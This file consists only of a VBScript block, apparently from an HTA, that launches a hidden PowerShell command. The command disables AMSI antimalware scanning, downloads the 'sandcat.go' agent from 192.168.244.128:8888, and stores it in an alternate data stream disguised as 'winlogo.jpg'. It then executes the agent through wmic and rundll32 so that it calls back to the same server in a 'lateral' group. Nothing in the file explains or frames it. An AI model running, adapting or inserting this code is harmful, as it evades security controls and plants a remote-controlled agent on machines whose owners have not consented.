<script language="VBScript">
Dim cmd
cmd = "powershell -windowstyle hidden -exec bypass -Command """
cmd = cmd & "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);"
cmd = cmd & "$url='http://192.168.244.128:8888/file/download';"
cmd = cmd & "$out='C:\\Users\\Public\\winlogo.jpg:sc.exe';"
cmd = cmd & "$wc=New-Object System.Net.WebClient;"
cmd = cmd & "$wc.Headers.Add('platform','windows');$wc.Headers.Add('file','sandcat.go');"
cmd = cmd & "$data=$wc.DownloadData($url);[IO.File]::WriteAllBytes($out,$data);"
cmd = cmd & "wmic process call create 'rundll32 advapi32.dll,CreateProcessAsUser " & Chr(34) & "C:\\Users\\Public\\winlogo.jpg:sc.exe -server http://192.168.244.128:8888 -group lateral" & Chr(34) & "'"""
CreateObject("Wscript.Shell").Run cmd, 0
self.close
</script>
